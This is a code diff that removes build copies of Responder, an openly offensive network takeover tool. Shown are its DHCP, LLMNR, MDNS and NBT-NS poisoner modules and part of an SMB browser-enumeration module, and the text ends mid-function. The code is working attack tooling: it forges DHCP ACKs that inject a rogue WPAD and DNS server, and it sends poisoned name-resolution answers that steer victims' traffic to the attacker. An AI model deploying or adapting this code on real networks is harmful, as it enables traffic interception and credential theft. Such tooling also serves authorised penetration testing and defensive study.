curr = end[1]
while curr is not end:
yield curr[0]
curr = curr[1]
def popitem(self, last=True):
if not self:
raise KeyError('dictionary is empty')
if last:
key = reversed(self).next()
else:
key = iter(self).next()
value = self.pop(key)
return key, value
def __reduce__(self):
items = [[k, self[k]] for k in self]
tmp = self.__map, self.__end
del self.__map, self.__end
inst_dict = vars(self).copy()
self.__map, self.__end = tmp
if inst_dict:
return (self.__class__, (items,), inst_dict)
return self.__class__, (items,)
def keys(self):
return list(self)
if sys.version_info >= (3, 0):
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.keys
itervalues = DictMixin.values
iteritems = DictMixin.items
else:
setdefault = DictMixin.setdefault
update = DictMixin.update
pop = DictMixin.pop
values = DictMixin.values
items = DictMixin.items
iterkeys = DictMixin.iterkeys
itervalues = DictMixin.itervalues
iteritems = DictMixin.iteritems
def __repr__(self):
if not self:
return '%s()' % (self.__class__.__name__,)
return '%s(%r)' % (self.__class__.__name__, self.items())
def copy(self):
return self.__class__(self)
@classmethod
def fromkeys(cls, iterable, value=None):
d = cls()
for key in iterable:
d[key] = value
return d
def __eq__(self, other):
if isinstance(other, OrderedDict):
return len(self)==len(other) and \
min(p==q for p, q in zip(self.items(), other.items()))
return dict.__eq__(self, other)
def __ne__(self, other):
return not self == other
if __name__ == '__main__':
d = OrderedDict([('foo',2),('bar',3),('baz',4),('zot',5),('arrgh',6)])
assert [x for x in d] == ['foo', 'bar', 'baz', 'zot', 'arrgh']

2493
build/lib/Responder/packets.py
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File diff suppressed because it is too large Load diff

350
build/lib/Responder/poisoners/DHCP.py
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@ -1,350 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
if (sys.version_info < (3, 0)):
sys.exit('This script is meant to be run with Python3')
import struct
import random
import optparse
import configparser
import os
import codecs
import netifaces
import binascii
BASEDIR = os.path.realpath(os.path.join(os.path.dirname(__file__), '..'))
sys.path.insert(0, BASEDIR)
from Responder.odict import OrderedDict
from Responder.utils import *
def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
#Python version
if (sys.version_info > (3, 0)):
PY2OR3 = "PY3"
else:
PY2OR3 = "PY2"
def StructWithLenPython2or3(endian,data):
#Python2...
if PY2OR3 == "PY2":
return struct.pack(endian, data)
#Python3...
else:
return struct.pack(endian, data).decode('latin-1')
def NetworkSendBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return bytes(str(data), 'latin-1')
def NetworkRecvBufferPython2or3(data):
if PY2OR3 == "PY2":
return str(data)
else:
return str(data.decode('latin-1'))
class Packet():
fields = OrderedDict([
("data", ""),
])
def __init__(self, **kw):
self.fields = OrderedDict(self.__class__.fields)
for k,v in kw.items():
if callable(v):
self.fields[k] = v(self.fields[k])
else:
self.fields[k] = v
def __str__(self):
return "".join(map(str, self.fields.values()))
config = configparser.ConfigParser()
config.read(os.path.join(BASEDIR,'Responder.conf'))
RespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'RespondTo').strip().split(',')] if _f]
DontRespondTo = [_f for _f in [x.upper().strip() for x in config.get('Responder Core', 'DontRespondTo').strip().split(',')] if _f]
Interface = settings.Config.Interface
Responder_IP = RespondWithIP()
ROUTERIP = Responder_IP # Set to Responder_IP in case we fall on a static IP network and we don't get a DHCP Offer. This var will be updated with the real dhcp IP if present.
NETMASK = "255.255.255.0"
DNSIP = "0.0.0.0"
DNSIP2 = "0.0.0.0"
DNSNAME = "local"
WPADSRV = "http://"+Responder_IP+"/wpad.dat"
Respond_To_Requests = True
DHCPClient = []
def GetMacAddress(Interface):
try:
mac = netifaces.ifaddresses(Interface)[netifaces.AF_LINK][0]['addr']
return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
except:
mac = "00:00:00:00:00:00"
return binascii.unhexlify(mac.replace(':', '')).decode('latin-1')
##### IP Header #####
class IPHead(Packet):
fields = OrderedDict([
("Version", "\x45"),
("DiffServices", "\x00"),
("TotalLen", "\x00\x00"),
("Ident", "\x00\x00"),
("Flags", "\x00\x00"),
("TTL", "\x40"),
("Protocol", "\x11"),
("Checksum", "\x00\x00"),
("SrcIP", ""),
("DstIP", ""),
])
class UDP(Packet):
fields = OrderedDict([
("SrcPort", "\x00\x43"),
("DstPort", "\x00\x44"),
("Len", "\x00\x00"),
("Checksum", "\x00\x00"),
("Data", "\x00\x00"),
])
def calculate(self):
self.fields["Len"] = StructWithLenPython2or3(">h",len(str(self.fields["Data"]))+8)
class DHCPDiscover(Packet):
fields = OrderedDict([
("MessType", "\x01"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", os.urandom(4).decode('latin-1')),
("ElapsedSec", "\x00\x01"),
("BootpFlags", "\x80\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", os.urandom(6).decode('latin-1')),#Needs to be random.
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x01"), #Msgtype(Discover)
("Op55", "\x37"),
("Op55Len", "\x0b"),
("Op55Str", "\x01\x03\x0c\x0f\x06\x1a\x21\x79\x77\x2a\x78"),#Requested info.
("Op12", "\x0c"),
("Op12Len", "\x09"),
("Op12Str", settings.Config.DHCPHostname),#random str.
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self):
self.fields["ClientMac"] = GetMacAddress(Interface)
class DHCPACK(Packet):
fields = OrderedDict([
("MessType", "\x02"),
("HdwType", "\x01"),
("HdwLen", "\x06"),
("Hops", "\x00"),
("Tid", "\x11\x22\x33\x44"),
("ElapsedSec", "\x00\x00"),
("BootpFlags", "\x00\x00"),
("ActualClientIP", "\x00\x00\x00\x00"),
("GiveClientIP", "\x00\x00\x00\x00"),
("NextServerIP", "\x00\x00\x00\x00"),
("RelayAgentIP", "\x00\x00\x00\x00"),
("ClientMac", "\xff\xff\xff\xff\xff\xff"),
("ClientMacPadding", "\x00" *10),
("ServerHostname", "\x00" * 64),
("BootFileName", "\x00" * 128),
("MagicCookie", "\x63\x82\x53\x63"),
("DHCPCode", "\x35"), #DHCP Message
("DHCPCodeLen", "\x01"),
("DHCPOpCode", "\x05"), #Msgtype(ACK)
("Op54", "\x36"),
("Op54Len", "\x04"),
("Op54Str", ""), #DHCP Server
("Op51", "\x33"),
("Op51Len", "\x04"),
("Op51Str", "\x00\x00\x00\x0a"), #Lease time
("Op1", "\x01"),
("Op1Len", "\x04"),
("Op1Str", ""), #Netmask
("Op15", "\x0f"),
("Op15Len", "\x0e"),
("Op15Str", ""), #DNS Name
("Op3", "\x03"),
("Op3Len", "\x04"),
("Op3Str", ""), #Router
("Op6", "\x06"),
("Op6Len", "\x08"),
("Op6Str", ""), #DNS Servers
("Op252", ""),
("Op252Len", ""),
("Op252Str", ""), #Wpad Server
("Op255", "\xff"),
("Padding", "\x00"),
])
def calculate(self, DHCP_DNS):
self.fields["Op54Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
self.fields["Op1Str"] = socket.inet_aton(NETMASK).decode('latin-1')
self.fields["Op3Str"] = socket.inet_aton(ROUTERIP).decode('latin-1')
self.fields["Op6Str"] = socket.inet_aton(DNSIP).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
self.fields["Op15Str"] = DNSNAME
if DHCP_DNS:
self.fields["Op6Str"] = socket.inet_aton(RespondWithIP()).decode('latin-1')+socket.inet_aton(DNSIP2).decode('latin-1')
else:
self.fields["Op252"] = "\xfc"
self.fields["Op252Str"] = WPADSRV
self.fields["Op252Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op252Str"])))
self.fields["Op51Str"] = StructWithLenPython2or3('>L', random.randrange(10, 20))
self.fields["Op15Len"] = StructWithLenPython2or3(">b",len(str(self.fields["Op15Str"])))
def RespondToThisIP(ClientIp):
if ClientIp.startswith('127.0.0.'):
return False
elif RespondTo and ClientIp not in RespondTo:
return False
elif ClientIp in RespondTo or RespondTo == []:
if ClientIp not in DontRespondTo:
return True
return False
def ParseSrcDSTAddr(data):
SrcIP = socket.inet_ntoa(data[0][26:30])
DstIP = socket.inet_ntoa(data[0][30:34])
SrcPort = struct.unpack('>H',data[0][34:36])[0]
DstPort = struct.unpack('>H',data[0][36:38])[0]
return SrcIP, SrcPort, DstIP, DstPort
def FindIP(data):
data = data.decode('latin-1')
IP = ''.join(re.findall(r'(?<=\x32\x04)[^EOF]*', data))
return ''.join(IP[0:4]).encode('latin-1')
def ParseDHCPCode(data, ClientIP,DHCP_DNS):
global DHCPClient
global ROUTERIP
PTid = data[4:8]
Seconds = data[8:10]
CurrentIP = socket.inet_ntoa(data[12:16])
RequestedIP = socket.inet_ntoa(data[16:20])
MacAddr = data[28:34]
MacAddrStr = ':'.join('%02x' % ord(m) for m in MacAddr.decode('latin-1')).upper()
OpCode = data[242:243]
RequestIP = data[245:249]
if DHCPClient.count(MacAddrStr) >= 4:
return "'%s' has been poisoned more than 4 times. Ignoring..." % MacAddrStr
if OpCode == b"\x02" and Respond_To_Requests: # DHCP Offer
ROUTERIP = ClientIP
return 'Found DHCP server IP: %s, now waiting for incoming requests...' % (ROUTERIP)
elif OpCode == b"\x03" and Respond_To_Requests: # DHCP Request
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), ElapsedSec=Seconds.decode('latin-1'))
Packet.calculate(DHCP_DNS)
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 68))
DHCPClient.append(MacAddrStr)
SaveDHCPToDb({
'MAC': MacAddrStr,
'IP': CurrentIP,
'RequestedIP': IPConv,
})
return 'Acknowledged DHCP Request for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
# DHCP Inform
elif OpCode == b"\x08":
IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=socket.inet_aton(CurrentIP).decode('latin-1'))
Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), ActualClientIP=socket.inet_aton(CurrentIP).decode('latin-1'),
GiveClientIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
NextServerIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
RelayAgentIP=socket.inet_aton("0.0.0.0").decode('latin-1'),
ElapsedSec=Seconds.decode('latin-1'))
Packet.calculate(DHCP_DNS)
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (CurrentIP, 68))
DHCPClient.append(MacAddrStr)
SaveDHCPToDb({
'MAC': MacAddrStr,
'IP': CurrentIP,
'RequestedIP': RequestedIP,
})
return 'Acknowledged DHCP Inform for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, RequestedIP, MacAddrStr)
elif OpCode == b"\x01" and Respond_To_Requests: # DHCP Discover
IP = FindIP(data)
if IP:
IPConv = socket.inet_ntoa(IP)
if RespondToThisIP(IPConv):
IP_Header = IPHead(SrcIP = socket.inet_aton(ROUTERIP).decode('latin-1'), DstIP=IP.decode('latin-1'))
Packet = DHCPACK(Tid=PTid.decode('latin-1'), ClientMac=MacAddr.decode('latin-1'), GiveClientIP=IP.decode('latin-1'), DHCPOpCode="\x02", ElapsedSec=Seconds.decode('latin-1'))
Packet.calculate(DHCP_DNS)
Buffer = UDP(Data = Packet)
Buffer.calculate()
SendDHCP(str(IP_Header)+str(Buffer), (IPConv, 0))
DHCPClient.append(MacAddrStr)
SaveDHCPToDb({
'MAC': MacAddrStr,
'IP': CurrentIP,
'RequestedIP': IPConv,
})
return 'Acknowledged DHCP Discover for IP: %s, Req IP: %s, MAC: %s' % (CurrentIP, IPConv, MacAddrStr)
def SendDiscover():
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
IP_Header = IPHead(SrcIP = socket.inet_aton('0.0.0.0').decode('latin-1'), DstIP=socket.inet_aton('255.255.255.255').decode('latin-1'))
Packet = DHCPDiscover()
Packet.calculate()
Buffer = UDP(SrcPort="\x00\x44", DstPort="\x00\x43",Data = Packet)
Buffer.calculate()
s.sendto(NetworkSendBufferPython2or3(str(IP_Header)+str(Buffer)), ('255.255.255.255', 67))
def SendDHCP(packet,Host):
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.sendto(NetworkSendBufferPython2or3(packet), Host)
def DHCP(DHCP_DNS):
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
s.bind((Interface, 0x0800))
SendDiscover()
while True:
data = s.recvfrom(65535)
if data[0][23:24] == b"\x11":# is udp?
SrcIP, SrcPort, DstIP, DstPort = ParseSrcDSTAddr(data)
if SrcPort == 67 or DstPort == 67:
ClientIP = socket.inet_ntoa(data[0][26:30])
ret = ParseDHCPCode(data[0][42:], ClientIP,DHCP_DNS)
if ret and not settings.Config.Quiet_Mode:
print(text("[*] [DHCP] %s" % ret))

115
build/lib/Responder/poisoners/LLMNR.py
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@ -1,115 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.packets import LLMNR_Ans, LLMNR6_Ans
from Responder.utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
#Should we answer to those AAAA?
Have_IPv6 = settings.Config.IPv6
def Parse_LLMNR_Name(data):
import codecs
NameLen = data[12]
if (sys.version_info > (3, 0)):
return data[13:13+NameLen]
else:
NameLen2 = int(codecs.encode(NameLen, 'hex'), 16)
return data[13:13+int(NameLen2)]
def IsICMPRedirectPlausible(IP):
dnsip = []
with open('/etc/resolv.conf', 'r') as file:
for line in file:
ip = line.split()
if len(ip) < 2:
continue
elif ip[0] == 'nameserver':
dnsip.extend(ip[1:])
for x in dnsip:
if x != "127.0.0.1" and IsIPv6IP(x) is False and IsOnTheSameSubnet(x,IP) is False: #Temp fix to ignore IPv6 DNS addresses
print(color("[Analyze mode: ICMP] You can ICMP Redirect on this network.", 5))
print(color("[Analyze mode: ICMP] This workstation (%s) is not on the same subnet than the DNS server (%s)." % (IP, x), 5))
print(color("[Analyze mode: ICMP] Use `python tools/Icmp-Redirect.py` for more details.", 5))
if settings.Config.AnalyzeMode:
IsICMPRedirectPlausible(settings.Config.Bind_To)
class LLMNR(BaseRequestHandler): # LLMNR Server class
def handle(self):
try:
data, soc = self.request
Name = Parse_LLMNR_Name(data).decode("latin-1")
LLMNRType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
return None
#IPv4
if data[2:4] == b'\x00\x00' and LLMNRType:
if settings.Config.AnalyzeMode:
LineHeader = "[Analyze mode: LLMNR]"
print(color("%s Request by %s for %s, ignoring" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
elif LLMNRType == True: # Poisoning Mode
#Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
else:
Buffer1 = LLMNR_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
elif LLMNRType == 'IPv6' and Have_IPv6:
#Default:
if settings.Config.TTL == None:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name)
else:
Buffer1 = LLMNR6_Ans(Tid=NetworkRecvBufferPython2or3(data[0:2]), QuestionName=Name, AnswerName=Name, TTL=settings.Config.TTL)
Buffer1.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [LLMNR]"
print(color("%s Poisoned answer sent to %s for name %s" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'LLMNR6',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
except:
pass

110
build/lib/Responder/poisoners/MDNS.py
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@ -1,110 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import struct
import sys
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
from Responder.packets import MDNS_Ans, MDNS6_Ans
from Responder.utils import *
#Should we answer to those AAAA?
Have_IPv6 = settings.Config.IPv6
def Parse_MDNS_Name(data):
try:
if (sys.version_info > (3, 0)):
data = data[12:]
NameLen = data[0]
Name = data[1:1+NameLen]
NameLen_ = data[1+NameLen]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
FinalName = Name+b'.'+Name_
return FinalName.decode("latin-1").replace("\x05","")
else:
data = NetworkRecvBufferPython2or3(data[12:])
NameLen = struct.unpack('>B',data[0])[0]
Name = data[1:1+NameLen]
NameLen_ = struct.unpack('>B',data[1+NameLen])[0]
Name_ = data[1+NameLen:1+NameLen+NameLen_+1]
return Name+'.'+Name_.replace("\x05","")
except IndexError:
return None
def Poisoned_MDNS_Name(data):
data = NetworkRecvBufferPython2or3(data[12:])
return data[:len(data)-5]
class MDNS(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
Request_Name = Parse_MDNS_Name(data)
MDNSType = Parse_IPV6_Addr(data)
# Break out if we don't want to respond to this host
if (not Request_Name) or (RespondToThisHost(self.client_address[0].replace("::ffff:",""), Request_Name) is not True):
return None
if settings.Config.AnalyzeMode: # Analyze Mode
print(text('[Analyze mode: MDNS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Request_Name, 3))))
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '1',
})
elif MDNSType == True: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
#Use default:
if settings.Config.TTL == None:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS_Ans(AnswerName = Poisoned_Name, TTL=settings.Config.TTL)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'MDNS',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '0',
})
elif MDNSType == 'IPv6' and Have_IPv6: # Poisoning Mode
Poisoned_Name = Poisoned_MDNS_Name(data)
#Use default:
if settings.Config.TTL == None:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name)
else:
Buffer = MDNS6_Ans(AnswerName = Poisoned_Name, TTL= settings.Config.TTL)
Buffer.calculate()
soc.sendto(NetworkSendBufferPython2or3(Buffer), self.client_address)
if not settings.Config.Quiet_Mode:
print(color('[*] [MDNS] Poisoned answer sent to %-15s for name %s' % (self.client_address[0].replace("::ffff:",""), Request_Name), 2, 1))
SavePoisonersToDb({
'Poisoner': 'MDNS6',
'SentToIp': self.client_address[0],
'ForName': Request_Name,
'AnalyzeMode': '0',
})
except:
raise

64
build/lib/Responder/poisoners/NBTNS.py
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@ -1,64 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
from Responder.packets import NBT_Ans
from Responder.utils import *
if (sys.version_info > (3, 0)):
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
# NBT_NS Server class.
class NBTNS(BaseRequestHandler):
def handle(self):
try:
data, socket = self.request
Name = Decode_Name(NetworkRecvBufferPython2or3(data[13:45]))
# Break out if we don't want to respond to this host
if RespondToThisHost(self.client_address[0].replace("::ffff:",""), Name) is not True:
return None
if data[2:4] == b'\x01\x10':
if settings.Config.AnalyzeMode: # Analyze Mode
print(text('[Analyze mode: NBT-NS] Request by %-15s for %s, ignoring' % (color(self.client_address[0].replace("::ffff:",""), 3), color(Name, 3))))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '1',
})
else: # Poisoning Mode
if settings.Config.TTL == None:
Buffer1 = NBT_Ans()
else:
Buffer1 = NBT_Ans(TTL=settings.Config.TTL)
Buffer1.calculate(data)
socket.sendto(NetworkSendBufferPython2or3(Buffer1), self.client_address)
if not settings.Config.Quiet_Mode:
LineHeader = "[*] [NBT-NS]"
print(color("%s Poisoned answer sent to %s for name %s (service: %s)" % (LineHeader, self.client_address[0].replace("::ffff:",""), Name, NBT_NS_Role(NetworkRecvBufferPython2or3(data[43:46]))), 2, 1))
SavePoisonersToDb({
'Poisoner': 'NBT-NS',
'SentToIp': self.client_address[0],
'ForName': Name,
'AnalyzeMode': '0',
})
except:
raise

0
build/lib/Responder/poisoners/__init__.py
View file

204
build/lib/Responder/servers/Browser.py
View file

@ -1,204 +0,0 @@
#!/usr/bin/env python
# This file is part of Responder, a network take-over set of tools
# created and maintained by Laurent Gaffie.
# email: laurent.gaffie@gmail.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from Responder.utils import *
from Responder.packets import SMBHeader, SMBNegoData, SMBSessionData, SMBTreeConnectData, RAPNetServerEnum3Data, SMBTransRAPData
if settings.Config.PY2OR3 == "PY3":
from socketserver import BaseRequestHandler
else:
from SocketServer import BaseRequestHandler
import struct
def WorkstationFingerPrint(data):
return {
b"\x04\x00" :"Windows 95",
b"\x04\x0A" :"Windows 98",
b"\x04\x5A" :"Windows ME",
b"\x05\x00" :"Windows 2000",
b"\x05\x01" :"Windows XP",
b"\x05\x02" :"Windows XP(64-Bit)/Windows 2003",
b"\x06\x00" :"Windows Vista/Server 2008",
b"\x06\x01" :"Windows 7/Server 2008R2",
b"\x06\x02" :"Windows 8/Server 2012",
b"\x06\x03" :"Windows 8.1/Server 2012R2",
b"\x0A\x00" :"Windows 10/Server 2016",
}.get(data, 'Unknown')
def RequestType(data):
return {
b"\x01": 'Host Announcement',
b"\x02": 'Request Announcement',
b"\x08": 'Browser Election',
b"\x09": 'Get Backup List Request',
b"\x0a": 'Get Backup List Response',
b"\x0b": 'Become Backup Browser',
b"\x0c": 'Domain/Workgroup Announcement',
b"\x0d": 'Master Announcement',
b"\x0e": 'Reset Browser State Announcement',
b"\x0f": 'Local Master Announcement',
}.get(data, 'Unknown')
def PrintServerName(data, entries):
if entries <= 0:
return None
entrieslen = 26 * entries
chunks, chunk_size = len(data[:entrieslen]), entrieslen//entries
ServerName = [data[i:i+chunk_size] for i in range(0, chunks, chunk_size)]
l = []
for x in ServerName:
fingerprint = WorkstationFingerPrint(x[16:18])
name = x[:16].strip(b'\x00').decode('latin-1')
l.append('%s (%s)' % (name, fingerprint))
return l
def ParsePacket(Payload):
PayloadOffset = struct.unpack('<H',Payload[51:53])[0]
StatusCode = Payload[PayloadOffset-4:PayloadOffset-2]
if StatusCode == b'\x00\x00':
EntriesNum = struct.unpack('<H',Payload[PayloadOffset:PayloadOffset+2])[0]
return PrintServerName(Payload[PayloadOffset+4:], EntriesNum)
return ''
def RAPThisDomain(Client,Domain):
PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80")
if PDC is not None:
print(text("[LANMAN] Detected Domains: %s" % ', '.join(PDC)))
SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00")
if SQL is not None:
print(text("[LANMAN] Detected SQL Servers on domain %s: %s" % (Domain, ', '.join(SQL))))
WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff")
if WKST is not None:
print(text("[LANMAN] Detected Workstations/Servers on domain %s: %s" % (Domain, ', '.join(WKST))))
def RapFinger(Host, Domain, Type):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((Host,445))
s.settimeout(0.3)
Header = SMBHeader(cmd="\x72",mid="\x01\x00")
Body = SMBNegoData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)#struct.pack(">i", len(''.join(Packet))) + Packet
s.send(NetworkSendBufferPython2or3(Buffer))
data = s.recv(1024)
# Session Setup AndX Request, Anonymous.
if data[8:10] == b'\x72\x00':
Header = SMBHeader(cmd="\x73",mid="\x02\x00")
Body = SMBSessionData()
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
s.send(NetworkSendBufferPython2or3(Buffer))
data = s.recv(1024)
# Tree Connect IPC$.
if data[8:10] == b'\x73\x00':
Header = SMBHeader(cmd="\x75",flag1="\x08", flag2="\x01\x00",uid=data[32:34].decode('latin-1'),mid="\x03\x00")
Body = SMBTreeConnectData(Path="\\\\"+Host+"\\IPC$")
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
s.send(NetworkSendBufferPython2or3(Buffer))
data = s.recv(1024)
# Rap ServerEnum.
if data[8:10] == b'\x75\x00':
Header = SMBHeader(cmd="\x25",flag1="\x08", flag2="\x01\xc8",uid=data[32:34].decode('latin-1'),tid=data[28:30].decode('latin-1'),pid=data[30:32].decode('latin-1'),mid="\x04\x00")
Body = SMBTransRAPData(Data=RAPNetServerEnum3Data(ServerType=Type,DetailLevel="\x01\x00",TargetDomain=Domain))
Body.calculate()
Packet = str(Header)+str(Body)
Buffer = StructPython2or3('>i', str(Packet))+str(Packet)
s.send(NetworkSendBufferPython2or3(Buffer))
data = s.recv(64736)
# Rap ServerEnum, Get answer and return what we're looking for.
if data[8:10] == b'\x25\x00':
s.close()
return ParsePacket(data)
except:
pass
def BecomeBackup(data,Client):
try:
DataOffset = struct.unpack('<H',data[139:141])[0]
BrowserPacket = data[82+DataOffset:]
ReqType = RequestType(BrowserPacket[0])
if ReqType == "Become Backup Browser":
ServerName = BrowserPacket[1:]
Domain = Decode_Name(data[49:81])
Name = Decode_Name(data[15:47])
Role = NBT_NS_Role(data[45:48])
if settings.Config.AnalyzeMode:
